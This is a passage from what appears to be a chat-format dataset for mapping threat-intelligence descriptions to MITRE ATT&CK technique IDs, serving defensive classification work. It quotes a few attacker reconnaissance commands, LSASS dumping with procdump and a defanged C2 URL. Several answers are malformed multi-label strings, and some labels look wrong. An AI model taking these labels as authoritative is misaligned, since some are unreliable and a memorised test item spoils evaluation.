- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "JCry has used PowerShell to execute payloads."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Another payload of the Ecipekac loader, which we call SodaMaster (a.k.a DelfsCake), is also a new fileless malware. In our research we found more than 10 samples of SodaMaster. The only differences were in the configuration data, including a hardcoded C2, an encoded RSA key and additional data for calculating a mutex value"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer', 'T1573.002 - Asymmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "More_eggs's payload has been encrypted with a key that has the hostname and processor family information appended to the end."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN6 has created Windows services to execute encoded PowerShell commands."
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has collected information from Microsoft SharePoint services within target networks."
- },
- {
- "role": "assistant",
- "content": "T1213 - Data from Information Repositories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bandook has decoded its PowerShell script."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MarkiRAT can capture clipboard content."
- },
- {
- "role": "assistant",
- "content": "T1115 - Clipboard Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CharmPower can remove persistence-related artifacts from the Registry."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "While the most recent samples observed still use batch scripts and SFX files, the Gamaredon Group has moved away from applications like wget, Remote Manipulator Tool, VNC and ChkFlsh.exe. Instead of using wget the attackers are distributing custom developed downloaders, and instead of Remote Manipulator or VNC the malware is using a custom developed remote access implant"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Okrum's loader can decrypt the backdoor code, embedded within the loader or within a legitimate PNG file. A custom XOR cipher or RC4 is used for decryption."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SHARPSTATS has the ability to identify the domain of the compromised host."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ThiefQuest obtains a list of running processes using the function \"kill_unwanted\"."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT39 has sent spearphishing emails in an attempt to lure users to click on a malicious attachment."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Empire has the ability to collect emails on a target system."
- },
- {
- "role": "assistant",
- "content": "T1114.001 - Email Collection: Local Email Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Honeybee, the threat actors used Base64 to encode files with a custom key."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LazyScripter has used spam emails that contain a link that redirects the victim to download a malicious document."
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MarkiRAT can retrieve the victim’s username."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "IceApple can delete files and directories from targeted systems."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has been known to add created accounts to local admin groups to maintain elevated access."
- },
- {
- "role": "assistant",
- "content": "T1098 - Account Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN7 attacks can and inject code into processes and hijack the search order used to load DLL files."
- },
- {
- "role": "assistant",
- "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Remexi searches for files on the system."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "runs the command: net start >> %TEMP%\\info.dat on a victim."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The tools uploaded to the webshells range from legitimate applications such as cURL to post-exploitation tools such as Mimikatz. We also observed the actors uploading custom backdoors such as HyperBro which is commonly associated with Emissary Panda"
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool', 'T1027 - Obfuscated Files or Information', 'T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DRATzarus can obtain a list of users from an infected machine."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The \"ZR\" variant of will check to see if known host-based firewalls are installed on the infected systems. will attempt to establish a C2 channel, then will examine open windows to identify a pop-up from the firewall software and will simulate a mouse-click to allow the connection to proceed."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Octopus can collect the username from the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BlackMatter remotely encrypts shares via SMB protocol and drops a ransomware note in each directory."
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lateral Movement, Maintain Presence, and Complete Mission APT39 facilitates lateral movement through myriad tools such as Remote Desktop Protocol (RDP), Secure Shell (SSH), PsExec, RemCom, and xCmdSvc"
- },
- {
- "role": "assistant",
- "content": "T1021.001 - Remote Services: Remote Desktop Protocol', 'T1021 - Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "contains the getInfoOSX function to return the OS X version as well as the current user."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stealth Falcon malware gathers data from the local victim system."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A variant of HOPLIGHT hooks lsass.exe, and lsass.exe then checks the Registry for the data value 'rdpproto' under the key \"SYSTEM\\CurrentControlSet\\Control\\Lsa Name\"."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chinese state-sponsored cyber actors have been observed: gaining credential access into victim networks by using legitimate, but compromised credentials to access OWA servers, corporate login portals, and victim networks."
- },
- {
- "role": "assistant",
- "content": "T1078.001 - Valid Accounts: Default Accounts', 'T1078.002 - Domain Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerStallion is a lightweight PowerShell backdoor using Microsoft OneDrive, a storage service in the cloud, as C&C server"
- },
- {
- "role": "assistant",
- "content": "T1102.002 - Bidirectional Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QakBot can use cmd.exe to launch itself and to execute multiple C2 commands."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Azorult can decrypt the payload into memory, create a new suspended process of itself, then inject a decrypted payload to the new process and resume new process execution."
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OilRig has used \"netstat -an\" on a victim to get a listing of network connections."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When each file is encrypted, registry keys are created under HKU\\{SID}\\Software\\Microsoft\\ RestartManager \\ which are used to track metadata pertaining to the file being encrypted, such as owner, sequence, session and file hash"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LitePower has the ability to list local drives and enumerate the OS architecture."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The usage of VMProtected binaries is another very common TTP that we’ve observed this group leverage in multiple intrusions in order to delay analysis of other tools in their toolkit"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OilRig has delivered macro-enabled documents that required targets to click the \"enable content\" button to execute the payload on the system."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HARDRAIN uses FakeTLS to communicate with its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1001.003 - Protocol or Service Impersonation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The structure of each of these outbound DNS requests is as follows: ---. The payload will look for different responses to these outbound queries depending on the type of DNS request that the payload uses to communicate with the C2"
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It loads the module with parameter vShow set to zero, which opens the application with a hidden window. Alternatively, if Avast is not installed on the machine, the malicious module loads using regsvr32.exe"
- },
- {
- "role": "assistant",
- "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LookBack can kill processes and delete services."
- },
- {
- "role": "assistant",
- "content": "T1489 - Service Stop"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Imminent Monitor has encrypted the spearphish attachments to avoid detection from email gateways; the debugger also encrypts information before sending to the C2."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerDuke has a command to list the victim's processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "However, if you DO get infected, you’ll want to delete the following registry keys (if they exist): HKLM/System/CurrentControlSet/Services/DirecastX ytasda jrqq HKLM/System/CurrentControlSet/Services/DirectX yta jsdrq HKLM/System/CurrentControlSet/Services/DirectX ytsda jrq Additionally, you’ll want to delete any copies of “svchost.exe” that you find in %Program Files (x86)%/DIFXE/, as these are the dropped copies of the malware"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion', 'T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SILENTTRINITY can take a screenshot of the current desktop."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Prior to downloading secondary payloads, CSPY Downloader initiates an extensive series of checks to determine if it is being debugged or running in a virtual environment, by searching for specific virtualization-related loaded modules, the process PEB structure, various file paths, registry keys, and memory"
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Commands such as \"net view\" can be used in Net to gather information about available remote systems."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Honeybee's service-based DLL implant traverses the FTP server’s directories looking for files with keyword matches for computer names or certain keywords."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ShimRat can uninstall itself from compromised hosts, as well create and modify directories, delete, move, copy, and rename files."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "contains a module that collects documents with certain extensions from removable media or fixed drives connected via USB."
- },
- {
- "role": "assistant",
- "content": "T1025 - Data from Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SDBbot is a new remote access Trojan (RAT) written in C++ that has been delivered by the Get2 downloader in recent TA505 campaigns. Its name is derived from the debugging log file (sdb.log.txt) and DLL name (BotDLL[.]dll) used in the initial analyzed sample. SDBbot is composed of three pieces: an installer, a loader, and a RAT component"
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection', 'T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has used \"net use\" to identify and establish a network connection with a remote host."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used valid digital certificates from Sysprint AG to sign its dropper."
- },
- {
- "role": "assistant",
- "content": "T1553.002 - Code Signing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Function and variable names are obfuscated. Strings are encrypted. Contain an encrypted .NET injector and one or more encrypted PE payloads. Take one argument that is the decryption key for the embedded .NET injector and PE payload(s). - Embedded .NET injector and payload(s) are encoded with Base64 and encrypted with Rijndael"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Collect information about each disk, including directory and file lists, disk names, total space, and remaining space"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malicious web shell activity as observed in the Cybereason solution. Commands executed via a modified version of the China Chopper web shell"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT33 has used base64 to encode payloads."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can upload files to the victim’s machine and can download additional payloads."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware uses obfuscation in order to hide strings such as URL or User-Agent, the algorithm is based on bitwise (SUB 0x0F XOR 0x21), here is the decoded data:hxxp://old[.]jrchina[.]com/btob_asiana/udel_confirm.phpMozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0; .NET4.0E; InfoPath.3)The downloaded third payload is obfuscated using the same technique"
- },
- {
- "role": "assistant",
- "content": "T1087 - Account Discovery', 'T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has sent spearphishing emails in an attempt to lure users to click on a malicious link."
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is known to use RAR with passwords to encrypt data prior to exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can disable Microsoft Office Protected View by changing Registry keys."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POSHSPY appends a file signature header (randomly selected from six file types) to encrypted data prior to upload or download."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 1 – The main code from the .NET wrapper, with the Shellcode array being created and executed in a new thread"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PipeMon’s first stage consists of a password-protected RARSFX executable embedded in the .rsrc section of its launcher. Once written to disk, the RARSFX is executed with CreateProcess by providing the decryption password in an argument, as follows"
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NBTscan can be used to scan IP networks."
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After the system reboots, the file “AJWrDz.exe” executes, which in turn triggers the side-loading of the malicious (and fake) DLL file “dbghelp.dll”. This malicious DLL file injects itself to Windows Media Player process — wmplayer.exe, and reflectively loads the renamed jesus.dmp file, “AJWrDz.dmp"
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In one of these campaigns, Waterbug used a USB stealer that scans removable storage devices to identify and collect files of interest. It then packages stolen files into a password-protected RAR archive. The malware then uses WebDAV to upload the RAR archive to a Box account"
- },
- {
- "role": "assistant",
- "content": "T1560.001 - Archive Collected Data: Archive via Utility', 'T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HAFNIUM has used \"procdump\" to dump the LSASS process memory."
- },
- {
- "role": "assistant",
- "content": "T1003.001 - OS Credential Dumping: LSASS Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses a WMI event subscription to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1546.003 - Event Triggered Execution: Windows Management Instrumentation Event Subscription"
- }
- ]
- },
- {
- "messages": [
- {
